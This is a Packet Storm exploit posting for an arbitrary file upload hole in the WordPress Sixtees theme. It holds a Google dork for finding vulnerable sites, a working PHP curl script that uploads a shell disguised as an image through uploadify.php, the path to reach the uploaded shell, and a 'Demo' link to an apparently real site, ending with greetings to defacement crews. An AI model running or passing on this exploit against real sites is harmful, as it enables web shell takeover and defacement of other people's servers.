WordPress Sixtees theme suffers from a remote shell upload vulnerability.
02c80838ba2125651bfdeb1b875afac9663238c95a9df7980b8b7b844f3a5a82 Wordpress Themes- Sixtees Arbitrary File Upload Vulnerability
######################################################################################
#
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/themes/sixtees"
#
#######################################################################################
---------------------------------------------------------------------------------------
Exploit : shell.php.jpg or .gif
<?php
$uploadfile="sh1ne.php.jpg";
$ch = curl_init("http://127.0.0.1/wp-content/themes/sixtees/sprites/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
-------------------------------------------------------------------------------------
Shell Access : http://www.localhost/wp-content/themes/sixtees/sprites/js/cufon-fonts/uploaded/custom_sh1ne.php.jpg
---------------------------------------------------------------------------------------
Demo :
http://www.sixteespromotions.com/wp-content/themes/Sixtees/sprites/js/uploadify/uploadify.php
---------------------------------------------------------------------------------------
sh00tz :
[+] Java Defacer Team - IDCA Team - No-Name Crew - IL-c0de - Bandung Blackhat
[+] Admin07 - Freezer22 - Pr0blemNymouz - Black Style - FH04ZA - MS06-87 - hantu_j4va - Antonio HsH - Taqiyya
[+] Mr.Xenophobic - Deflectoz - DeYuBi-Cyber - Mbah_Dukun - Mr./AryeaKoplaxz404 - Sanja07 - ice-cream - p0zh1e - K4C3 Undetected
[ NOTE ]
[+] Tetap Mencoba dan Terus Mencoba
\!/ INDONESIAN PEOPLE HERE \!/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed